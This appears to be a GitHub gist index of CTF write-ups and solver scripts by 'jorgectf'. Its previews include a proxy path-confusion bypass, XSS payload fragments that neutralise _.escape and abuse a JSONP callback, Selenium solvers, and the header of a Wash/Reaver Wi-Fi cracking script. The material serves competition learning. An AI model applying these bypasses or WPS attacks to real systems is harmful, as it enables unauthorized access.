🎯
Learning

Jorge jorgectf

@jorgectf
jorgectf / LINE CTF 2022 - title todo.md
Last active May 14, 2022
LINE CTF 2022 - title todo
@jorgectf
jorgectf / TSJ_CTF_2022_NimjaAtNantou.md
Last active Mar 26, 2022
TSJ CTF 2022 - Nimja at Nantou solution

Nimja at Nantou

map /hello-from-the-world/key http://127.0.0.1:80/forbidden
map /hello-from-the-world/    http://127.0.0.1:80
map /service-info/admin       http://127.0.0.1:5000/forbidden
map /service-info/            http://127.0.0.1:5000/

Because /hello-from-the-world/ is mapped to http://127.0.0.1:80 (without the trailing slash), a request for /hello-from-the-world//key does not match the first rule but is still a valid path under the second rule. This let us get the key:

@jorgectf
jorgectf / DefCamp_2020.md
Last active Nov 22, 2021
Solution for some DefCamp 2020 CTF's Web challenges.
@jorgectf
jorgectf / DragonSector_2020_Scratchpad.md
Last active Nov 22, 2021
Solution for DragonSector 2020 CTF's ScratchPad challenge.
@jorgectf
jorgectf / intigriti-xss-10-2021.md
Last active Nov 21, 2021
Intigriti's October 2021 XSS challenge writeup.

TL;DR

This month's challenge consists of exploiting custom JS code hosted on a Halloween-styled document. In short, we'll be injecting JS inside a <script> tag (thanks to an interesting detail in the CSP) that was previously injected into the innerHTML of a div in the document.

The solution of this challenge has been found in collaboration with @carlospolopm.

Initial approach


@jorgectf
jorgectf / sync_discord_bot.py
Created Aug 28, 2021
Synchronized Discord bot in Python 3.
from discord import Client, CategoryChannel
import discord.utils
from time import sleep
import threading
import asyncio
import os
class Bot(Client):
    guild = None
    guild_id = os.getenv("DISCORD_GUILD_ID", None)
@jorgectf
jorgectf / washXreaver.sh
Last active Aug 14, 2021 — forked from iGh0st/d4rk-r34v3r.sh
Wash and Reaver automation script.
#!/bin/bash
# Require exactly one argument: the wireless interface name
if [ "$#" -ne 1 ]; then
    echo "Illegal number of parameters"
    echo "Usage: $0 INTERFACE"
    exit 1
fi
interface=$1
if (( EUID != 0 )); then
@jorgectf
jorgectf / LineCTF_2021_Your-Notes.py
Last active Mar 21, 2021
Line's CTF Your Notes solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
@jorgectf
jorgectf / NahamConCTF_2021_AgentTester.py
Last active Mar 15, 2021
NahamCon CTF's AgentTester solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests
def random_string(length):
@jorgectf
jorgectf / AeroCTF_2021_Not-received-points.md
Last active Mar 1, 2021
AeroCTF 2021's "Not received points" solution.

Void _.escape

// this turns the client-side function that escaped our input into a no-op
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){